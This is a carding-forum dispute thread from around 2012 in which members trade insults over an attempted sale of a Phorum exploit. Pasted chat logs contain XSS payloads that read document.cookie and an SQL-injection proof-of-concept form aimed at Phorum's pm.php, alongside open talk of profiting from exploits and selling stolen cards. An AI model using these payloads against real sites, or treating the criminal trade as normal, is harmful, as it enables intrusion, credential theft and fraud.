carder2012 is a RIPPER

[ZatoxP1]

Hey

carder2012 is a RIPPER

link to profile: http://carder.market/member.php?u=50788


So this retard tried to scamm me for Phorum exploit, which obviously he doesnt have, he said he worked with his team on it yesterday and he want 700$ LR for it.

Chat logs from yahoo:

carder2012: expolit ready. guys dont want to share. howver ready to sell via escrow .safe and sound. let me know when you need.

 3:31:21 PM  
[email protected]: proof

 3:31:57 PM  
carder2012: escrow is proof of everything Man. 

3:32:04 PM  
[email protected]: no its not

 3:32:16 PM  
carder2012: you will pay money to 3rd party not us

 3:32:22 PM  
[email protected]: show me proof

 3:32:27 PM  
[email protected]: shouldnt be a problem for u

 3:32:44 PM  
carder2012: ok

 3:34:07 PM  
carder2012: sending a bit codes.

 3:34:18 PM  
carder2012: [size=20px;xss:expression(alert(document.cookie));]Sysdream Testing XSS[/size]
The application convert it into the follow HTML code :
<span style="color:#000000;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
and
<span style="font-size: 20px;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
For IE6 you can use this POC:
[color=#000000;background-image:url(javascript:alert('Sysdream_IE6_Alert'));]Sysdream
Testing IE6[/color]
For IE7:
[color=#000000;xss:expression(alert('Sysdream_IE7_Alert'));]Sysdream Testing
XSS[/color]
Obviously, the POC doesn't work in IE8 and Firefox.
But, but , but...
Uploading htc (for IE8) or xml (for FF) file on the phorum using the "My
Files" function in "Control Center", you can use :
POC for FF:
[color=#000000;-moz-binding:

 3:35:41 PM  
carder2012: you know coding?

 3:35:56 PM  
[email protected]: how does this proove anything

 3:36:18 PM  
[email protected]: its some XSS

 3:36:41 PM  
[email protected]: "Obviously, the POC doesn't work in IE8 and Firefox."

 3:37:01 PM  
carder2012: very easy. i will describe and send all material you in email, or will upload and share link.

 3:37:19 PM  
carder2012: no. its only to show some or little info related 

3:37:40 PM  
carder2012: you know how important it is

 3:37:42 PM  
[email protected]: sorry but im not going to send you 700$ without any good proof

 3:38:35 PM  
carder2012: i am not greedy for $700. let me ask from guys.if they agree small upfront. i can send you all info

 3:38:42 PM  
carder2012: later we work for %

 3:39:03 PM  
carder2012: rest of work you do OK?

 3:39:09 PM  
[email protected]: im not paying anything upfront

 3:39:11 PM  
[email protected]: show me proof

 3:39:14 PM  
[email protected]: instead of some shitty code

 3:39:24 PM  
[email protected]: make screenshot

 3:45:01 PM  
carder2012: How to use file: full function

 3:45:05 PM  
carder2012: As we can see, if "$user_id" is array, then there is no sanitize against data before
using in sql query.
After some research I have found a way to use this bug for sql injection. For this,
first of all, potential attacker must have valid user account in specific Phorum-powered
website and he/she must be logged in. And then let's try this proof-of-concept html file:

------------------[PoC exploit]-----------------------
Zhtml>
Zbody>
<form action="http://localhost/phorum.5.1.20/pm.php" method="post">
<input type="hidden" name="recipients[1) OR foobar=123/* ]" value="waraxe">
<input type="submit" name"test" value="test">
</body>
</html>
------------------[/PoC exploit]----------------------

Of course, "action" parameter must be modified to match real target.
As testing result we will see s

 3:45:37 PM  
carder2012: Still not satisfy. then try your luck to find better guy

 3:46:13 PM  
[email protected]: http://www.exploit-db.com/exploits/9231/

Obvious scamm is obvious.

 

[carder2012]

Respected Moderator,s admin

i have contacted the Guy WIDOWZ to provide him exploit.

thread URL: http://www.carder.market/showthread.php?t=52550

i have mention in chat i am not a single member team. my other 2 boys can do that easily. i sent him offer for $950


Total chat history:

4:12:54 PM Not YourBizz: hey4:13:00 PM carder2012: hello4:13:03 PM Not YourBizz: 950$ LR for?4:14:00 PM carder2012: exploit for Phorum4:14:19 PM Not YourBizz: and did u already found it4:15:09 PM carder2012: when you need?4:15:18 PM Not YourBizz: idk4:15:26 PM Not YourBizz: and i can pay 700 LR or 850 WU4:16:08 PM carder2012: ok exploit for Phorum will support postgre SQL also4:16:18 PM carder2012: rest of things you know4:16:51 PM Not YourBizz: with this exploit i can easily make 50k$ + 4:17:02 PM Not YourBizz: and i need more exploits for different scripts4:17:07 PM Not YourBizz: we can just do like4:17:10 PM Not YourBizz: find the explo4:17:13 PM Not YourBizz: i will use it to make money4:17:16 PM Not YourBizz: and u get some %4:17:30 PM carder2012: Well i want to ask only some questions4:17:40 PM carder2012: how many peoples you are in?4:17:51 PM carder2012: because this is not work for only 1 person4:17:59 PM Not YourBizz: 24:18:10 PM carder2012: both partners should be trustable4:18:20 PM Not YourBizz: this is a guy i know since im born4:18:22 PM Not YourBizz: well almost4:18:26 PM carder2012: and you can see my profile. with good feedback on forum4:18:39 PM Not YourBizz: if you provide me the exploit i can make shitload of cash 4:18:40 PM Not YourBizz: believe me4:18:46 PM Not YourBizz: and you will get much better fee than 700$4:19:22 PM carder2012: But you know thiswill be our first deal. so i want wisely deal4:19:29 PM carder2012: LR payments ok4:19:31 PM carder2012: ?IM Feb 13, 2012 4:24:31 PM4:19:39 PM Not YourBizz: sure LR is fine4:19:47 PM Not YourBizz: but i would prefer WU tbh4:19:49 PM Not YourBizz: much easier4:20:04 PM carder2012: Here WU risky.littlebit4:20:06 PM Not YourBizz: if u want to send big amounts of cash,,, its hard to add funds to LR u know4:20:07 PM carder2012: LR much best4:20:12 PM carder2012: yes4:20:20 PM carder2012: later we can arrange WU or Moneygrame4:20:25 PM Not YourBizz: ok 4:20:51 PM carder2012: now your time starts. fund your lr. when all things done. come here we will work.4:21:03 PM carder2012: in my group 3 peoples 1 me 2 friends4:21:09 PM Not YourBizz: what do u mean4:21:10 PM Not YourBizz: i told u4:21:13 PM Not YourBizz: get the exploit4:21:16 PM Not YourBizz: you will get paid4:21:27 PM Not YourBizz: we will share the money i will make with this exploit4:21:43 PM Not YourBizz: im not going to pay anything upfront sry4:22:03 PM carder2012: so you want exploit ist4:22:12 PM carder2012: no1 will give you. belive me4:22:16 PM carder2012: upto you4:22:20 PM carder2012: best of luck4:22:58 PM Not YourBizz: noone will pay you 700$ wihout even seeing proof4:23:26 PM carder2012: let me think and ask from friends wheather they agree to share4:23:50 PM Not YourBizz: im not scamming partners i need people who can hack, so we can together make BIG CASH4:23:54 PM Not YourBizz: its up to u though4:24:08 PM carder2012: just chill4:24:12 PM carder2012: give me sometime4:24:19 PM carder2012: i,ll get back to you asap4:24:30 PM carder2012: because we all are fellows need QUIK cash4:24:31 PM Not YourBizz: ok npIM Feb 13, 2012 4:24:58 PM4:24:32 PM carder2012: am i right?4:24:48 PM Not YourBizz: if u can get exploit and i will do the rest4:24:51 PM Not YourBizz: we all need cash 4:24:58 PM carder2012: hmmmIM Feb 14, 2012 7:46:13 AM7:31:09 AM carder2012: expolit ready. guys dont want to share. howver ready to sell via escrow .safe and sound. let me know when you need.7:31:21 AM Not YourBizz: proof7:31:57 AM carder2012: escrow is proof of everything Man. 7:32:04 AM Not YourBizz: no its not7:32:16 AM carder2012: you will pay money to 3rd party not us7:32:22 AM Not YourBizz: show me proof7:32:27 AM Not YourBizz: shouldnt be a problem for u7:32:44 AM carder2012: ok7:34:07 AM carder2012: sending a bit codes.7:34:18 AM carder2012: [size=20px;xss:expression(alert(document.cookie));]Sysdream Testing XSS[/size]
The application convert it into the follow HTML code :
<span style="color:#000000;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
and
<span style="font-size: 20px;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
For IE6 you can use this POC:
[color=#000000;background-image:url(javascript:alert('Sysdream_IE6_Alert'));]Sysdream
Testing IE6[/color]
For IE7:
[color=#000000;xss:expression(alert('Sysdream_IE7_Alert'));]Sysdream Testing
XSS[/color]
Obviously, the POC doesn't work in IE8 and Firefox.
But, but , but...
Uploading htc (for IE8) or xml (for FF) file on the phorum using the "My
Files" function in "Control Center", you can use :
POC for FF:
[color=#000000;-moz-binding:7:35:41 AM carder2012: you know coding?7:35:56 AM Not YourBizz: how does this proove anything7:36:18 AM Not YourBizz: its some XSS7:36:41 AM Not YourBizz: "Obviously, the POC doesn't work in IE8 and Firefox."7:36:45 AM Not YourBizz: sorry but i think its fake7:37:01 AM carder2012: very easy. i will describe and send all material you in email, or will upload and share link.7:37:19 AM carder2012: no. its only to show some or little info related 7:37:40 AM carder2012: you know how important it is7:37:42 AM Not YourBizz: sorry but im not going to send you 700$ without any good proof7:38:35 AM carder2012: i am not greedy for $700. let me ask from guys.if they agree small upfront. i can send you all info7:38:42 AM carder2012: later we work for %7:39:03 AM carder2012: rest of work you do OK?7:39:09 AM Not YourBizz: im not paying anything upfront7:39:11 AM Not YourBizz: show me proof7:39:14 AM Not YourBizz: instead of some shitty code7:39:24 AM Not YourBizz: make screenshot7:45:01 AM carder2012: How to use file: full function7:45:05 AM carder2012: As we can see, if "$user_id" is array, then there is no sanitize against data before
using in sql query.
After some research I have found a way to use this bug for sql injection. For this,
first of all, potential attacker must have valid user account in specific Phorum-powered
website and he/she must be logged in. And then let's try this proof-of-concept html file:

------------------[PoC exploit]-----------------------
Zhtml>
Zbody>
<form action="http://localhost/phorum.5.1.20/pm.php" method="post">
<input type="hidden" name="recipients[1) OR foobar=123/* ]" value="waraxe">
<input type="submit" name"test" value="test">
</body>
</html>
------------------[/PoC exploit]----------------------

Of course, "action" parameter must be modified to match real target.
As testing result we will see s7:45:37 AM carder2012: Still not satisfy. then try your luck to find better guy7:46:13 AM Not YourBizz: http://www.exploit-db.com/exploits/9231/IM Feb 14, 2012 8:09:26 AM7:46:15 AM Not YourBizz: haha7:46:20 AM Not YourBizz: now gtfo yo ufucking retard8:09:19 AM Not YourBizz: reported u on carder.market











At the end i want to say i have not sent him my LR account or any info to send me money. i have mention will work with escrow.
via help notes it cannot proof me i am scammer, i collected most of info from web. and rest of things will do my 2 other friends
i am not . and 1 more thing when i send him offer to work escrow he refused totally


Belive me or not i was not trying him to scam. Ist this mental guy have not trust on business as well as escrow system.

and mention me where i beg him in chat to send me amount now.


I hope mod will take right decision. However i am here to learn and want good economy as all needs.I always trying my best to post good stuff, reply to right threads, uses forum with rules. Thats all from me

 

[ZatoxP1]

Of course that u tried to scamm me you fucking skid, i told you to proove me that u found vulnerability and you posted me some outdated XSS shit, now GTFO.

 

[carder2012]

ZatoxP1 & WIDOWZ

mention where in chat i said this is what i or my friends will give you.


i told you to take your time think it and nobody will give you even a single code without payment upfront or escrow.

nobody will share. believe me.

Thank,s God i haven't deal with you . because you are a KID

Respected Mod

I have not received any upfront amount from him. and i dont want to do any business from him. i dont know how many accounts they have. but i dont want to be ban.

I,ll try my best to keep forum rules to be obey

 

[ZatoxP1]

ZatoxP1 & WIDOWZ

mention where in chat i said this is what i or my friends will give you.


i told you to take your time think it and nobody will give you even a single code without payment upfront or escrow.

nobody will share. believe me.

Thank,s God i haven't deal with you . because you are a KID

Respected Mod

I have not received any upfront amount from him. and i dont want to do any business from him. i dont know how many accounts they have. but i dont want to be ban.

I,ll try my best to keep forum rules to be obey

You havent received any payment because im not retarded to get scammed by skid like you, you have even modified the public exploit a bit so i cant find it on google , BIG FAIL, and you pasted half of a code first to proove me, but it was public outdated exploit.

Ban him or dont i dont care, but he is a scammer and im 100% sure.

 

[carder2012]

Ist of all i have not edited anything.


2nd thing take 1 week and try to find it on Google as you are saying. i hope you will find some related info like this.but at the end you cannot prove original,s


3rd thing: which you are telling WRONG. i offered it in $950 not in $700. check your pm and chat history.

 

[ZatoxP1]

Ist of all i have not edited anything.


2nd thing take 1 week and try to find it on Google as you are saying. i hope you will find some related info like this.but at the end you cannot prove original,s


3rd thing: which you are telling WRONG. i offered it in $950 not in $700. check your pm and chat history.

http://www.exploit-db.com/exploits/9231/

 

[carder2012]

ZatoxP1 & WIDOWZ


Now i am 1000 % sure that you are trying something unusual. when i asked you you know coding you did not replied me

then i have sent this link. for demo purposes what to do or not


i have mentioned in chat after transfer of data rest of things you will work and you admitted.


buddy you are clearly on wrong side.

 

[ZatoxP1]

ZatoxP1 & WIDOWZ


Now i am 1000 % sure that you are trying something unusual. when i asked you you know coding you did not replied me

then i have sent this link. for demo purposes what to do or not


i have mentioned in chat after transfer of data rest of things you will work and you admitted.


buddy you are clearly on wrong side.

Wtf are you talking about kid, you didnt send me this link, i found it myself, and exploit in this link is what you ctrl+c ctrl+v to me on Yahoo IM.


3:31:21 PM
[email protected]: proof

3:31:57 PM
carder2012: escrow is proof of everything Man.

this is the best part btw LMFAO

 

[carder2012]

Wtf are you talking about kid, you didnt send me this link, i found it myself, and exploit in this link is what you ctrl+c ctrl+v to me on Yahoo IM.


3:31:21 PM
[email protected]: proof

3:31:57 PM
carder2012: escrow is proof of everything Man.

this is the best part btw LMFAO

>>>ohhhh. lol read the forum rules carefully ESCROW is guarantee of payment.if you dont know how to use escrow then damn shit you have no right to stay here.

>>>these line you mention is earlier in chat.
>>>when i asked you. do you know coding? you did,nt replied

>>>then i sent codes. exactly helping notes( example)

>>> according to rules you have right reserve to Put me on blacklist if i received payment & ripped you. But payment not received. because you refused escrow as well as upfront. your demand was ist hand stuff.

>>>> I have offered this to WIDOWZ . dont know you either. and before deal done WIDOWZ banned.

>>>why you are threatening by mentioning i ripped you

 

[ZatoxP1]

>>>ohhhh. lol read the forum rules carefully ESCROW is guarantee of payment.if you dont know how to use escrow then damn shit you have no right to stay here.

>>>these line you mention is earlier in chat.
>>>when i asked you. do you know coding? you did,nt replied

>>>then i sent codes. exactly helping notes( example)

>>> according to rules you have right reserve to Put me on blacklist if i received payment & ripped you. But payment not received. because you refused escrow as well as upfront. your demand was ist hand stuff.

>>>> I have offered this to WIDOWZ . dont know you either. and before deal done WIDOWZ banned.

>>>why you are threatening by mentioning i ripped you

You are sir retarded as fuck

[email protected]: show me proof

 3:32:27 PM  
[email protected]: shouldnt be a problem for u

 3:32:44 PM  
carder2012: ok

 3:34:07 PM  
carder2012: sending a bit codes.

 3:34:18 PM  
carder2012: [size=20px;xss:expression(alert(document.cookie));]Sysdream Testing XSS[/size]
The application convert it into the follow HTML code :
<span style="color:#000000;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
and
<span style="font-size: 20px;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
For IE6 you can use this POC:
[color=#000000;background-image:url(javascript:alert('Sysdream_IE6_Alert'));]Sysdream
Testing IE6[/color]
For IE7:
[color=#000000;xss:expression(alert('Sysdream_IE7_Alert'));]Sysdream Testing
XSS[/color]
Obviously, the POC doesn't work in IE8 and Firefox.
But, but , but...
Uploading htc (for IE8) or xml (for FF) file on the phorum using the "My
Files" function in "Control Center", you can use :
POC for FF:
[color=#000000;-moz-binding:

 3:35:41 PM  
carder2012: you know coding?

I know code, and whats ur point about it, whats the difference if i can code or not?

I asked you for a proof and u copy/pased outdated exploit from exploit-db.

FAIL FAIL FAIL

 

[carder2012]

I asked because after deal done. if you say this is not working or there is some problem Then better is to ask which things you know or not.


so you are predicting Fresh exploit without upfront or putting money in escrow.i am not psycho till now.

even you dont know how to deal. because if there is anything you want. you can decide whether you want it or not.

if you was true you never ignore escrow.as you mentioning you are selling cc. so why you dont know rules???

 

[ZatoxP1]

I asked because after deal done. if you say this is not working or there is some problem Then better is to ask which things you know or not.


so you are predicting Fresh exploit without upfront or putting money in escrow.i am not psycho till now.

even you dont know how to deal. because if there is anything you want. you can decide whether you want it or not.

if you was true you never ignore escrow.as you mentioning you are selling cc. so why you dont know rules???

jeesus u r so fucking retarded , i asked you for a proof, screenshot or anything, u said u r going to send some code, which was outdated exploit from exploit-db, now gtfo im done with wasting time on trash like you.

 

[carder2012]

fuck off. i wasted my time for you. because yourself is Outdated also.

 

[Ninja]

You both was banned for 3 days.
Come here in 3 days and continue discussian in apropriate manner without all this dirty things and insultings.
Thank you.

 

[Ninja]

Any update?

btw. carder2012 also have other nicknames:
Rolix777
xxprocc